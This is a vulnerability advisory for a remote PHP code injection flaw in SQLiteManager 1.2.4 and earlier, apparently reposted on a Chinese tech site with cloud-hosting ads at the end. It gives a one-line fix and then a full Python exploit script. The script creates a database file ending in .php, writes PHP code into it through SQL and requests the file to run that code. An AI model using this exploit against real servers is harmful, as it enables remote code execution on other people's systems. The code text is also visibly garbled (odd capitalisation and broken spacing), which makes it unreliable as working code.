Overview:
========================================================== ======================================
Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Author: RealGame
Developer: http://www.Relagame.co.il
: Http://sourceforge.net/projects/sqlitemanager/
Affected version <= 1.2.4
Test System: Windows XP, Debian 2.6.32-46
========================================================== ======================================
Defect Program
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
========================================================== ======================================
Program Introduction
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
Any SQLite database created on any platform with SQLiteManager.
========================================================== ======================================
Easy Way To Fix:
Find: SQLiteStripSlashes ($ _ POST ['dbpath'])
Replace: str_replace ('.', '', SQLiteStripSlashes ($ _ POST ['dbpath'])
On File:./include/add_database.php
========================================================== ======================================
Import re
Import urllib2
From urllib import urlencode
From sys import argv, exit
Def strip_tags (value ):
# Strip tags with RegEx
Return re. sub ('<[^>] *?> ', '', Value)
Def getDbId (sqliteUrl, myDbName ):
# Find Components
HtmlRes = urllib2.urlopen (sqliteUrl, None, 120). read ()
If htmlRes:
# If you found it take all the rows
Td = re. findall ('<td class = "name_db"> (.*?) </Td> ', htmlRes, re. DOTALL)
# Make a dict of stripped columns
For element in td:
If strip_tags (element) = myDbName:
# Return Id
Return "". join (re. findall ('\? Dbsel = (.*?) "', Element, re. DOTALL ))
Return None
Def main (): www.2cto.com
Print \
'Sqlitemanager Exploit \ n' + \
'Made By RealGame \ n' + \
'Http: // www. RealGame. co. il \ N'
If len (argv) <2:
# Replace ('\', '/')-To Do The Same In Win And Linux
Filename = argv [0]. replace ('\', '/'). split ('/') [-1]
Print 'execute Example: '+ filename + 'HTTP: // 127.0.0.1/sqlite/\ N'
Exit ()
SqliteUrl = argv [1]
MyDbName = "phpinfo"
MyDbFile = "phpinfo. php"
# Create Database
Params = {'dbname': myDbName,
'Dbversion': '2 ',
'Dbrealpath': None,
'Dbpath': myDbFile,
'Action': 'savedb '}
Urllib2.urlopen (sqliteUrl + "main. php", urlencode (params), 120)
# Get Database ID
DbId = getDbId (sqliteUrl + "left. php", myDbName)
# If Database Created
If dbId:
# Create Table + Shell Creator
Params = {'displayquery': 'create TABLE temptab (codetab text); \ n' + \
'Insert INTO temptab VALUES (\ '<? Php phpinfo (); unlink (_ FILE _);?> \ '); \ N ',
'Sqlfile': None,
'Action': 'SQL ',
'Sqltype': '1 '}
Urllib2.urlopen (sqliteUrl + "main. php? Dbsel = % s & table = temptab "% dbId, urlencode (params), 120)
# Inject Code
Urllib2.urlopen (sqliteUrl + mydb file, None, 120)
# Remove Database
Urllib2.urlopen (sqliteUrl + "main. php? Dbsel = % s & table = & view = & trigger = & function = & action = del "% dbId, None, 120)
Print 'succeed'
Return
Print 'failed'
If _ name _ = '_ main __':
Main ()
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
